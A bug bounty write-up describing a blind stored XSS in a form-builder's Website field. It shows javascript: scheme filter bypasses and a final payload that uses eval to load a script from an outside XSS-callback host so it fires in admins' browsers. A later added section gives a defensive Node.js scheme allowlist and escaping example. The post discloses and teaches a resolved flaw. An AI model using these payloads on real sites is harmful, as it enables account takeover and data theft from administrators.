Hack Your Form - New vector for Blind XSS

Youssef A. Mohamed
Mar 12, 2019 · 3 min read

Hello Pentesters,

I’m Youssef A. Mohamed aka GeneralEG
Security Researcher @CESPPA , Cyber Security Engineer @Squnity and SRT Member @Synack

  • Today I’m gonna share a juicy finding with you.

This is about bypassing a couple of filters to execute malicious JavaScript easily and achieve a Blind Stored XSS.

“I found this issue in a lot of targets, so I will take one of these programs as an example.”

The program is private so let’s call it redacted.com

  • Recently I was testing this program and, after some recon, I found that the website offers a specific service (Create Forms).

How does this service work?
1) The creator user creates a form
2) The creator user shares the link with a visitor
3) The visitor fills in the form
4) The filled-in information is available to the form’s creator at redacted.com/manager/{Form ID}/

So while testing the “Create form” functions, I found that there’s a Website input.

I made a simple form.


Then I opened the form as a visitor.

At first I tried to bypass it in the basic style
(I thought that if I wrote a website.com?” payload it would execute).

So, I entered:
https://example.com/?"%22"

( “ + URL encoded + HTML entity encoded )

Then opened the creator account to see what happened.

But unfortunately, the filter encoded the double quotes:
https://example.com"%22"

and I noticed that the link was rendered in an <a> tag.


So, I decided to grab a cup of coffee :”D

  • After a few minutes of deep thinking over my coffee about how I would bypass this one,

I decided to start fuzzing this input in particular: {Enter Website}

While fuzzing, I noticed that the filter accepted test:https://example.com !


Then I tried javascript:https//evil.com
and it worked :D
“Evil loud laugh”

  • Now I’m sure that there’s XSS here,
    but it needs a real website merged with my payload, so I wrote this one:

javascript:x='http://x.c';alert('xss');//

Finally executed!

  • But wait, we want to make it a Blind XSS to attack the real admins (the best scenario).

So the last payload was:

javascript:eval('a=document.createElement(\'script\');a.src=\'https://generaleg.xss.ht\';document.body.appendChild(a)');s='https://s.com'


¯\_(ツ)_/¯

That’s it!

Notes:

  • 80% of my targets which had a Website input were vulnerable to the same scenario.
  • To make sure that your target is vulnerable to the same problem, you need to check a few things:

A. Check whether the website accepts other URI schemes, such as javascript:https://generaleg0x01.com, or not.

B. Check whether the website renders your https://generaleg0x01.com inside an HTML ‘a’ tag or not.

  • In most similar situations, the same payload will work perfectly.
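From the defender’s side, the root cause in this write-up is that the Website field was “validated” by escaping quotes instead of restricting the URL scheme, so values like test:… and javascript:… passed through and ended up in an <a href>. The following Node.js snippet is an added example, not code from the post or from the affected program; the function names and the two-scheme allowlist are this example’s own choices. It parses the value with the WHATWG URL class, accepts only http: and https:, and escapes the result before placing it in markup. The sample inputs are constructed, modelled on the probes from the post.

```javascript
// Added example (not from the original post): server-side handling of a
// user-supplied "Website" field so that only http(s) URLs ever reach an
// <a href>. Uses the WHATWG URL parser built into Node.js.
// The function names and allowlist below are this example's own choices.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns a normalized absolute http(s) URL, or null when the input is not
// one. Checking the *parsed* protocol (rather than the raw string) means
// case tricks ("JavaScript:") and tab/newline splitting ("java\tscript:")
// are handled by the parser instead of by a regex we would have to get right.
function validateWebsiteUrl(input) {
  if (typeof input !== "string" || input.length > 2048) return null;
  let url;
  try {
    url = new URL(input); // throws on relative or unparsable input
  } catch (e) {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  return url.href; // the serializer percent-encodes " < > and friends
}

// Minimal HTML attribute/text escaping. Even a valid URL must be escaped
// when inserted into markup: scheme validation and output encoding are two
// separate controls, and the post shows what happens when only one exists.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Renders the form creator's view of the field: a link when the value is a
// safe http(s) URL, otherwise the raw text as inert escaped content.
function renderWebsiteLink(input) {
  const href = validateWebsiteUrl(input);
  if (href === null) {
    return escapeHtml(input == null ? "" : String(input));
  }
  const safe = escapeHtml(href);
  return `<a href="${safe}" rel="noopener noreferrer">${safe}</a>`;
}

// Constructed sample inputs modelled on the probes in the post.
const SAMPLES = [
  'https://example.com/?"%22"',
  "test:https://example.com",
  "javascript:https//evil.com",
  "javascript:x='http://x.c';alert('xss');//",
  "JavaScript:alert(1)",
  "java\tscript:alert(1)",
  "not a url",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "->", renderWebsiteLink(s));
}
```

Only the first sample becomes a link, and its double quotes come back percent-encoded by the URL serializer; every other sample is shown as escaped text with no href at all. Rejecting unknown schemes with an allowlist (rather than blocklisting javascript:) is what closes the test: and javascript: cases from the post in one step.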

Timeline:
20 December, 2018: Report Submitted
25 December, 2018: Report Reviewed and Triaged
30 December, 2018: Report Resolved & $800 Bounty Awarded

Learned lessons:

  • Fuzz as much as you can.
  • Don’t stop at one technique to bypass the filter; try other techniques.

Happy Hacking!
